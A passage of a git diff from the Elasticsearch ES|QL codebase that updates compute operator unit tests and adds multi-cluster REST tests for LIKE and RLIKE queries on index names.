testSequentialStoredFields(boolean sequential, int docCount) throws int key = keys.getInt(p); checks.strings(results.get(0).getBlock(2), p, key); } - ValuesSourceReaderOperator.Status status = (ValuesSourceReaderOperator.Status) op.status(); + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) op.status(); assertMap( status.readersBuilt(), matchesMap().entry("key:column_at_a_time:BlockDocValuesReader.SingletonInts", 1) @@ -1536,6 +1708,7 @@ public void testDescriptionOfMany() throws IOException { List cases = infoAndChecksForEachType(ordering, ordering); 
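// A note on the ByteSizeValue.ofGb(1) argument threaded through every Factory above: it
// looks to be the new "jumbo" limit on how many bytes of loaded values one output page may
// carry. When the values loaded for a single input page would exceed it, the operator emits
// that page in several chunks, which is why the status now reports pagesReceived and
// pagesEmitted separately instead of a single pagesProcessed count. A minimal sketch of the
// resulting accounting, assuming a hypothetical bytesOf(Page) size estimator:
//
//   int received = 0;
//   int emitted = 0;
//   for (Page p : input) {
//       received++;
//       long bytes = bytesOf(p);
//       emitted += Math.toIntExact(Math.max(1, (bytes + limit.getBytes() - 1) / limit.getBytes()));
//   }
//
// With the 1gb limit used in these tests nothing splits, so emitted == received; the "1kb"
// jumbo setting exercised by the REST tests further down forces emitted >= received.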
ValuesSourceReaderOperator.Factory factory = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), cases.stream().map(c -> c.info).toList(), List.of( new ValuesSourceReaderOperator.ShardContext( @@ -1589,6 +1762,7 @@ public void testManyShards() throws IOException { ); MappedFieldType ft = mapperService.fieldType("key"); var readerFactory = new ValuesSourceReaderOperator.Factory( + ByteSizeValue.ofGb(1), List.of(new ValuesSourceReaderOperator.FieldInfo("key", ElementType.INT, shardIdx -> { seenShards.add(shardIdx); return ft.blockLoader(blContext()); diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/AddGarbageRowsSourceOperator.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/AddGarbageRowsSourceOperator.java index 079be87161421..c035430433b1e 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/AddGarbageRowsSourceOperator.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/AddGarbageRowsSourceOperator.java @@ -39,6 +39,11 @@ public Block eval(Page page) { return block; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }; diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/ColumnExtractOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/ColumnExtractOperatorTests.java index f3bc02ffe5845..c43c8540c9928 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/ColumnExtractOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/ColumnExtractOperatorTests.java @@ -65,6 +65,11 @@ public Block eval(Page page) { return input; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }, diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverProfileTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverProfileTests.java index c8f8094f69c27..016997369d403 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverProfileTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverProfileTests.java @@ -12,8 +12,8 @@ import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.LuceneSourceOperatorStatusTests; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperatorStatusTests; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatus; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatusTests; import org.elasticsearch.compute.operator.exchange.ExchangeSinkOperator; import org.elasticsearch.test.AbstractWireSerializingTestCase; import org.elasticsearch.test.ESTestCase; @@ -166,7 +166,7 @@ protected DriverProfile mutateInstance(DriverProfile instance) throws IOExceptio @Override protected NamedWriteableRegistry getNamedWriteableRegistry() { return new NamedWriteableRegistry( - List.of(LuceneSourceOperator.Status.ENTRY, ValuesSourceReaderOperator.Status.ENTRY, ExchangeSinkOperator.Status.ENTRY) + List.of(LuceneSourceOperator.Status.ENTRY, ValuesSourceReaderOperatorStatus.ENTRY, ExchangeSinkOperator.Status.ENTRY) ); } } diff --git 
a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverStatusTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverStatusTests.java index df3583d0c99bd..c990fb99cd7dd 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverStatusTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverStatusTests.java @@ -12,8 +12,8 @@ import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.LuceneSourceOperatorStatusTests; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperatorStatusTests; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatus; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperatorStatusTests; import org.elasticsearch.compute.operator.exchange.ExchangeSinkOperator; import org.elasticsearch.compute.operator.exchange.ExchangeSinkOperatorStatusTests; import org.elasticsearch.test.AbstractWireSerializingTestCase; @@ -202,7 +202,7 @@ protected DriverStatus mutateInstance(DriverStatus instance) throws IOException @Override protected NamedWriteableRegistry getNamedWriteableRegistry() { return new NamedWriteableRegistry( - List.of(LuceneSourceOperator.Status.ENTRY, ValuesSourceReaderOperator.Status.ENTRY, ExchangeSinkOperator.Status.ENTRY) + List.of(LuceneSourceOperator.Status.ENTRY, ValuesSourceReaderOperatorStatus.ENTRY, ExchangeSinkOperator.Status.ENTRY) ); } } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverTests.java index c538cf41ee1fd..46aba449fcb90 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/DriverTests.java @@ -49,6 +49,8 @@ import static org.hamcrest.Matchers.either; import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.not; +import static org.hamcrest.Matchers.sameInstance; public class DriverTests extends ESTestCase { /** @@ -204,6 +206,47 @@ public void testProfileAndStatusInterval() { assertThat(driver.profile().iterations(), equalTo((long) inPages.size())); } + public void testUnchangedStatus() { + DriverContext driverContext = driverContext(); + List inPages = randomList(2, 100, DriverTests::randomPage); + List outPages = new ArrayList<>(); + + long startEpoch = randomNonNegativeLong(); + long startNanos = randomLong(); + long waitTime = randomLongBetween(10000, 100000); + long tickTime = randomLongBetween(10000, 100000); + long statusInterval = randomLongBetween(1, 10); + + Driver driver = createDriver(startEpoch, startNanos, driverContext, inPages, outPages, TimeValue.timeValueNanos(statusInterval)); + + NowSupplier nowSupplier = new NowSupplier(startNanos, waitTime, tickTime); + + int iterationsPerTick = randomIntBetween(1, 10); + + for (int i = 0; i < inPages.size(); i += iterationsPerTick) { + DriverStatus initialStatus = driver.status(); + long completedOperatorsHash = initialStatus.completedOperators().hashCode(); + long activeOperatorsHash = initialStatus.activeOperators().hashCode(); + long sleepsHash = initialStatus.sleeps().hashCode(); + + driver.run(TimeValue.timeValueDays(10), iterationsPerTick, 
nowSupplier); + + DriverStatus newStatus = driver.status(); + assertThat(newStatus, not(sameInstance(initialStatus))); + assertThat( + newStatus.completedOperators() != initialStatus.completedOperators() + || newStatus.completedOperators().hashCode() == completedOperatorsHash, + equalTo(true) + ); + assertThat( + newStatus.activeOperators() != initialStatus.activeOperators() + || newStatus.activeOperators().hashCode() == activeOperatorsHash, + equalTo(true) + ); + assertThat(newStatus.sleeps() != initialStatus.sleeps() || newStatus.sleeps().hashCode() == sleepsHash, equalTo(true)); + } + } + private static Driver createDriver( long startEpoch, long startNanos, @@ -328,7 +371,7 @@ public void testEarlyTermination() { final AtomicInteger processedRows = new AtomicInteger(0); var sinkHandler = new ExchangeSinkHandler(driverContext.blockFactory(), positions, System::currentTimeMillis); var sinkOperator = new ExchangeSinkOperator(sinkHandler.createExchangeSink(() -> {})); - final var delayOperator = new EvalOperator(driverContext.blockFactory(), new EvalOperator.ExpressionEvaluator() { + final var delayOperator = new EvalOperator(driverContext, new EvalOperator.ExpressionEvaluator() { @Override public Block eval(Page page) { for (int i = 0; i < page.getPositionCount(); i++) { @@ -340,6 +383,11 @@ public Block eval(Page page) { return driverContext.blockFactory().newConstantBooleanBlockWith(true, page.getPositionCount()); } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() { diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/EvalOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/EvalOperatorTests.java index 189ccdb402f94..d820305819a6e 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/EvalOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/EvalOperatorTests.java @@ -46,6 +46,11 @@ public Block eval(Page page) { } } + @Override + public long baseRamBytesUsed() { + return 1; + } + @Override public String toString() { return "Addition[lhs=" + lhs + ", rhs=" + rhs + ']'; @@ -63,6 +68,11 @@ public Block eval(Page page) { return block; } + @Override + public long baseRamBytesUsed() { + return 2; + } + @Override public void close() {} } diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/FilterOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/FilterOperatorTests.java index fb1f7b5422308..3ac7650d4d39a 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/FilterOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/FilterOperatorTests.java @@ -44,6 +44,11 @@ public Block eval(Page page) { return result.build().asBlock(); } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public String toString() { return "SameLastDigit[lhs=" + lhs + ", rhs=" + rhs + ']'; diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/SampleOperatorStatusTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/SampleOperatorStatusTests.java new file mode 100644 index 0000000000000..50f3f456f3745 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/SampleOperatorStatusTests.java @@ -0,0 +1,72 @@ +/* + * Copyright 
Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.operator; + +import org.elasticsearch.common.Strings; +import org.elasticsearch.common.io.stream.Writeable; +import org.elasticsearch.test.AbstractWireSerializingTestCase; +import org.elasticsearch.test.ESTestCase; + +import static org.hamcrest.Matchers.equalTo; + +public class SampleOperatorStatusTests extends AbstractWireSerializingTestCase<SampleOperator.Status> { + public static SampleOperator.Status simple() { + return new SampleOperator.Status(500012, 200012, 123, 111, 222); + } + + public static String simpleToJson() { + return """ + { + "collect_nanos" : 500012, + "collect_time" : "500micros", + "emit_nanos" : 200012, + "emit_time" : "200micros", + "pages_processed" : 123, + "rows_received" : 111, + "rows_emitted" : 222 + }"""; + } + + public void testToXContent() { + assertThat(Strings.toString(simple(), true, true), equalTo(simpleToJson())); + } + + @Override + protected Writeable.Reader<SampleOperator.Status> instanceReader() { + return SampleOperator.Status::new; + } + + @Override + public SampleOperator.Status createTestInstance() { + return new SampleOperator.Status( + randomNonNegativeLong(), + randomNonNegativeLong(), + randomNonNegativeInt(), + randomNonNegativeLong(), + randomNonNegativeLong() + ); + } + + @Override + protected SampleOperator.Status mutateInstance(SampleOperator.Status instance) { + long collectNanos = instance.collectNanos(); + long emitNanos = instance.emitNanos(); + int pagesProcessed = instance.pagesProcessed(); + long rowsReceived = instance.rowsReceived(); + long rowsEmitted = instance.rowsEmitted(); + switch (between(0, 4)) { + case 0 -> collectNanos = randomValueOtherThan(collectNanos, ESTestCase::randomNonNegativeLong); + case 1 -> emitNanos = randomValueOtherThan(emitNanos, ESTestCase::randomNonNegativeLong); + case 2 -> pagesProcessed = randomValueOtherThan(pagesProcessed, ESTestCase::randomNonNegativeInt); + case 3 -> rowsReceived = randomValueOtherThan(rowsReceived, ESTestCase::randomNonNegativeLong); + case 4 -> rowsEmitted = randomValueOtherThan(rowsEmitted, ESTestCase::randomNonNegativeLong); + default -> throw new UnsupportedOperationException(); + } + return new SampleOperator.Status(collectNanos, emitNanos, pagesProcessed, rowsReceived, rowsEmitted); + } +} diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/StringExtractOperatorTests.java b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/StringExtractOperatorTests.java index 382cfc93bfabf..bcccd2707e7f3 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/StringExtractOperatorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/StringExtractOperatorTests.java @@ -53,6 +53,11 @@ public Block eval(Page page) { return block; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }, @@ -94,6 +99,11 @@ public Block eval(Page page) { return block; } + @Override + public long baseRamBytesUsed() { + return 0; + } + @Override public void close() {} }, new FirstWord("test"), driverContext()); diff --git a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/topn/ExtractorTests.java
b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/topn/ExtractorTests.java index b345d8c0b196a..c5f91f05e76b3 100644 --- a/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/topn/ExtractorTests.java +++ b/x-pack/plugin/esql/compute/src/test/java/org/elasticsearch/compute/operator/topn/ExtractorTests.java @@ -13,6 +13,7 @@ import org.apache.lucene.util.BytesRef; import org.elasticsearch.common.breaker.CircuitBreaker; import org.elasticsearch.common.breaker.NoopCircuitBreaker; +import org.elasticsearch.compute.data.AggregateMetricDoubleBlockBuilder.AggregateMetricDoubleLiteral; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BlockUtils; @@ -42,9 +43,27 @@ public static Iterable<Object[]> parameters() { switch (e) { case UNKNOWN -> { } - case COMPOSITE, AGGREGATE_METRIC_DOUBLE -> { + case COMPOSITE -> { // TODO: add later } + case AGGREGATE_METRIC_DOUBLE -> { + cases.add( + valueTestCase( + "regular aggregate_metric_double", + e, + TopNEncoder.DEFAULT_UNSORTABLE, + () -> randomAggregateMetricDouble(true) + ) + ); + cases.add( + valueTestCase( + "aggregate_metric_double with nulls", + e, + TopNEncoder.DEFAULT_UNSORTABLE, + () -> randomAggregateMetricDouble(false) + ) + ); + } case FLOAT -> { } case BYTES_REF -> { @@ -105,7 +124,8 @@ public static Iterable<Object[]> parameters() { ).asBlock() ) } ); - case NULL -> cases.add(valueTestCase("null", e, TopNEncoder.DEFAULT_UNSORTABLE, () -> null)); + case NULL -> { + } default -> { cases.add(valueTestCase("single " + e, e, TopNEncoder.DEFAULT_UNSORTABLE, () -> BlockTestUtils.randomValue(e))); cases.add( @@ -118,6 +138,9 @@ public static Iterable<Object[]> parameters() { ); } } + if (e != ElementType.UNKNOWN && e != ElementType.COMPOSITE && e != ElementType.FLOAT && e != ElementType.DOC) { + cases.add(valueTestCase("null " + e, e, TopNEncoder.DEFAULT_UNSORTABLE, () -> null)); + } } return cases; } @@ -221,4 +244,16 @@ public void testInKey() { assertThat(result.build(), equalTo(value)); } + + public static AggregateMetricDoubleLiteral randomAggregateMetricDouble(boolean allMetrics) { + if (allMetrics) { + return new AggregateMetricDoubleLiteral(randomDouble(), randomDouble(), randomDouble(), randomInt()); + } + return new AggregateMetricDoubleLiteral( + randomBoolean() ? randomDouble() : null, + randomBoolean() ? randomDouble() : null, + randomBoolean() ? randomDouble() : null, + randomBoolean() ? randomInt() : null + ); + } } diff --git a/x-pack/plugin/esql/compute/test/src/main/java/org/elasticsearch/compute/test/OperatorTestCase.java b/x-pack/plugin/esql/compute/test/src/main/java/org/elasticsearch/compute/test/OperatorTestCase.java index 56ae2fb4119a8..f9f9769929f28 100644 --- a/x-pack/plugin/esql/compute/test/src/main/java/org/elasticsearch/compute/test/OperatorTestCase.java +++ b/x-pack/plugin/esql/compute/test/src/main/java/org/elasticsearch/compute/test/OperatorTestCase.java @@ -98,10 +98,16 @@ protected ByteSizeValue enoughMemoryForSimple() { * all pages. */ public final void testSimpleCircuitBreaking() { - ByteSizeValue memoryLimitForSimple = enoughMemoryForSimple(); - Operator.OperatorFactory simple = simple(new SimpleOptions(true)); + /* + * Build the input before building `simple` to handle the rare + * cases where `simple` needs some state from the input - mostly + * this is ValuesSourceReaderOperator.
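+ * (Concretely: in ValuesSourceReaderOperatorTests the factory that simple() builds reads
+ * the IndexReader opened while simpleInput(...) collects the input, so constructing the
+ * factory first would capture a reader that does not exist yet.)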
+ */ DriverContext inputFactoryContext = driverContext(); List input = CannedSourceOperator.collectPages(simpleInput(inputFactoryContext.blockFactory(), between(1_000, 10_000))); + + ByteSizeValue memoryLimitForSimple = enoughMemoryForSimple(); + Operator.OperatorFactory simple = simple(new SimpleOptions(true)); try { ByteSizeValue limit = BreakerTestUtil.findBreakerLimit(memoryLimitForSimple, l -> runWithLimit(simple, input, l)); ByteSizeValue testWithSize = ByteSizeValue.ofBytes(randomLongBetween(0, limit.getBytes())); diff --git a/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/MultiClustersIT.java b/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/MultiClustersIT.java index 4ea413e4fcd3b..b657d74c97d9b 100644 --- a/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/MultiClustersIT.java +++ b/x-pack/plugin/esql/qa/server/multi-clusters/src/javaRestTest/java/org/elasticsearch/xpack/esql/ccq/MultiClustersIT.java @@ -29,19 +29,25 @@ import org.junit.rules.TestRule; import java.io.IOException; +import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.Set; +import java.util.function.Predicate; import java.util.stream.Collectors; import java.util.stream.IntStream; import java.util.stream.Stream; import static org.elasticsearch.test.MapMatcher.assertMap; +import static org.elasticsearch.test.MapMatcher.matchesMap; import static org.elasticsearch.xpack.esql.ccq.Clusters.REMOTE_CLUSTER_NAME; import static org.hamcrest.Matchers.any; +import static org.hamcrest.Matchers.anyOf; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.greaterThanOrEqualTo; import static org.hamcrest.Matchers.hasKey; +import static org.hamcrest.Matchers.is; +import static org.hamcrest.Matchers.nullValue; @ThreadLeakFilters(filters = TestClustersThreadFilter.class) public class MultiClustersIT extends ESRestTestCase { @@ -66,6 +72,7 @@ record Doc(int id, String color, long data) { List localDocs = List.of(); final String remoteIndex = "test-remote-index"; List remoteDocs = List.of(); + private Boolean shouldCheckShardCounts = null; @Before public void setUpIndices() throws Exception { @@ -129,7 +136,7 @@ void indexDocs(RestClient client, String index, List docs) throws IOExcepti } private Map run(String query, boolean includeCCSMetadata) throws IOException { - var queryBuilder = new RestEsqlTestCase.RequestObjectBuilder().query(query); + var queryBuilder = new RestEsqlTestCase.RequestObjectBuilder().query(query).profile(true); if (includeCCSMetadata) { queryBuilder.includeCCSMetadata(true); } @@ -158,12 +165,58 @@ private Map runEsql(RestEsqlTestCase.RequestObjectBuilder reques } } + private boolean checkShardCounts() { + if (shouldCheckShardCounts == null) { + try { + shouldCheckShardCounts = capabilitiesSupportedNewAndOld(List.of("correct_skipped_shard_count")); + } catch (IOException e) { + shouldCheckShardCounts = false; + } + } + return shouldCheckShardCounts; + } + + private void assertResultMapForLike( + boolean includeCCSMetadata, + Map result, + C columns, + V values, + boolean remoteOnly, + boolean requireLikeListCapability + ) throws IOException { + List requiredCapabilities = new ArrayList<>(List.of("like_on_index_fields")); + if (requireLikeListCapability) { + requiredCapabilities.add("like_list_on_index_fields"); + } + // the feature is completely supported if both local and remote clusters support it 
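+ // (in a mixed-version deployment only one side may have been upgraded; when either
+ // cluster lacks the capability we only check that the response was not partial,
+ // because the set of matching rows is then version-dependent)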
+ boolean isSupported = capabilitiesSupportedNewAndOld(requiredCapabilities); + + if (isSupported) { + assertResultMap(includeCCSMetadata, result, columns, values, remoteOnly); + } else { + logger.info("--> skipping data check for like index test, cluster does not support like index feature"); + // just verify that we did not get a partial result + var clusters = result.get("_clusters"); + var reason = "unexpected partial results" + (clusters != null ? ": _clusters=" + clusters : ""); + assertThat(reason, result.get("is_partial"), anyOf(nullValue(), is(false))); + } + } + + private boolean capabilitiesSupportedNewAndOld(List requiredCapabilities) throws IOException { + boolean isSupported = clusterHasCapability("POST", "/_query", List.of(), requiredCapabilities).orElse(false); + try (RestClient remoteClient = remoteClusterClient()) { + isSupported = isSupported + && clusterHasCapability(remoteClient, "POST", "/_query", List.of(), requiredCapabilities).orElse(false); + } + return isSupported; + } + private void assertResultMap(boolean includeCCSMetadata, Map result, C columns, V values, boolean remoteOnly) { MapMatcher mapMatcher = getResultMatcher( ccsMetadataAvailable(), result.containsKey("is_partial"), result.containsKey("documents_found") - ); + ).extraOk(); if (includeCCSMetadata) { mapMatcher = mapMatcher.entry("_clusters", any(Map.class)); } @@ -251,12 +304,19 @@ private void assertClusterDetailsMap(Map result, boolean remoteO @SuppressWarnings("unchecked") Map remoteClusterShards = (Map) remoteCluster.get("_shards"); - assertThat(remoteClusterShards.keySet(), equalTo(Set.of("total", "successful", "skipped", "failed"))); - assertThat((Integer) remoteClusterShards.get("total"), greaterThanOrEqualTo(0)); - assertThat((Integer) remoteClusterShards.get("successful"), equalTo((Integer) remoteClusterShards.get("total"))); - assertThat((Integer) remoteClusterShards.get("skipped"), equalTo(0)); - assertThat((Integer) remoteClusterShards.get("failed"), equalTo(0)); - + assertThat( + remoteClusterShards, + matchesMap().entry("total", greaterThanOrEqualTo(0)) + .entry("successful", greaterThanOrEqualTo(0)) + .entry("skipped", greaterThanOrEqualTo(0)) + .entry("failed", 0) + ); + if (checkShardCounts()) { + assertThat( + (int) remoteClusterShards.get("successful") + (int) remoteClusterShards.get("skipped"), + equalTo(remoteClusterShards.get("total")) + ); + } if (remoteOnly == false) { @SuppressWarnings("unchecked") Map localCluster = (Map) details.get("(local)"); @@ -267,11 +327,19 @@ private void assertClusterDetailsMap(Map result, boolean remoteO @SuppressWarnings("unchecked") Map localClusterShards = (Map) localCluster.get("_shards"); - assertThat(localClusterShards.keySet(), equalTo(Set.of("total", "successful", "skipped", "failed"))); - assertThat((Integer) localClusterShards.get("total"), greaterThanOrEqualTo(0)); - assertThat((Integer) localClusterShards.get("successful"), equalTo((Integer) localClusterShards.get("total"))); - assertThat((Integer) localClusterShards.get("skipped"), equalTo(0)); - assertThat((Integer) localClusterShards.get("failed"), equalTo(0)); + assertThat( + localClusterShards, + matchesMap().entry("total", greaterThanOrEqualTo(0)) + .entry("successful", greaterThanOrEqualTo(0)) + .entry("skipped", greaterThanOrEqualTo(0)) + .entry("failed", 0) + ); + if (checkShardCounts()) { + assertThat( + (int) localClusterShards.get("successful") + (int) localClusterShards.get("skipped"), + equalTo(localClusterShards.get("total")) + ); + } } } @@ -371,6 +439,159 @@ public void 
testStats() throws IOException { assertThat(clusterData, hasKey("took")); } + public void testLikeIndex() throws Exception { + + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index LIKE "*remote*" + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = List.of(List.of(remoteDocs.size(), REMOTE_CLUSTER_NAME + ":" + remoteIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + + public void testLikeIndexLegacySettingNoResults() throws Exception { + // the feature is completely supported if both local and remote clusters support it + assumeTrue("not supported", capabilitiesSupportedNewAndOld(List.of("like_on_index_fields"))); + try ( + ClusterSettingToggle ignored = new ClusterSettingToggle(adminClient(), "esql.query.string_like_on_index", false, true); + RestClient remoteClient = remoteClusterClient(); + ClusterSettingToggle ignored2 = new ClusterSettingToggle(remoteClient, "esql.query.string_like_on_index", false, true) + ) { + // test code with the setting changed + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index LIKE "*remote*" + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + // we expect empty result, since the setting is false + var values = List.of(); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + } + + public void testLikeIndexLegacySettingResults() throws Exception { + // we require that the admin client supports the like_on_index_fields capability + // otherwise we will get an error when trying to toggle the setting + // the remote client does not have to support it + assumeTrue("not supported", capabilitiesSupportedNewAndOld(List.of("like_on_index_fields"))); + try ( + ClusterSettingToggle ignored = new ClusterSettingToggle(adminClient(), "esql.query.string_like_on_index", false, true); + RestClient remoteClient = remoteClusterClient(); + ClusterSettingToggle ignored2 = new ClusterSettingToggle(remoteClient, "esql.query.string_like_on_index", false, true) + ) { + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index LIKE "*remote*:*remote*" + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + // we expect results, since the setting is false, but there is : in the LIKE query + var values = List.of(List.of(remoteDocs.size(), REMOTE_CLUSTER_NAME + ":" + remoteIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + } + + public void testNotLikeIndex() throws Exception { + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index NOT LIKE "*remote*" + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = 
List.of(List.of(localDocs.size(), localIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, false); + } + + public void testLikeListIndex() throws Exception { + // the feature is completely supported if both local and remote clusters support it + assumeTrue("not supported", capabilitiesSupportedNewAndOld(List.of("like_list_on_index_fields"))); + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index LIKE ("*remote*", "not-exist*") + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = List.of(List.of(remoteDocs.size(), REMOTE_CLUSTER_NAME + ":" + remoteIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, true); + } + + public void testNotLikeListIndex() throws Exception { + assumeTrue("not supported", capabilitiesSupportedNewAndOld(List.of("like_list_on_index_fields"))); + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index NOT LIKE ("*remote*", "not-exist*") + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = List.of(List.of(localDocs.size(), localIndex)); + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, true); + } + + public void testNotLikeListKeyword() throws Exception { + assumeTrue("not supported", capabilitiesSupportedNewAndOld(List.of("like_with_list_of_patterns"))); + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE color NOT LIKE ("*blue*", "*red*") + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + Predicate filter = d -> false == (d.color.contains("blue") || d.color.contains("red")); + + var values = new ArrayList<>(); + int remoteCount = (int) remoteDocs.stream().filter(filter).count(); + int localCount = (int) localDocs.stream().filter(filter).count(); + if (remoteCount > 0) { + values.add(List.of(remoteCount, REMOTE_CLUSTER_NAME + ":" + remoteIndex)); + } + if (localCount > 0) { + values.add(List.of(localCount, localIndex)); + } + assertResultMapForLike(includeCCSMetadata, result, columns, values, false, true); + } + + public void testRLikeIndex() throws Exception { + boolean includeCCSMetadata = includeCCSMetadata(); + Map result = run(""" + FROM test-local-index,*:test-remote-index METADATA _index + | WHERE _index RLIKE ".*remote.*" + | STATS c = COUNT(*) BY _index + | SORT _index ASC + """, includeCCSMetadata); + var columns = List.of(Map.of("name", "c", "type", "long"), Map.of("name", "_index", "type", "keyword")); + var values = List.of(List.of(remoteDocs.size(), 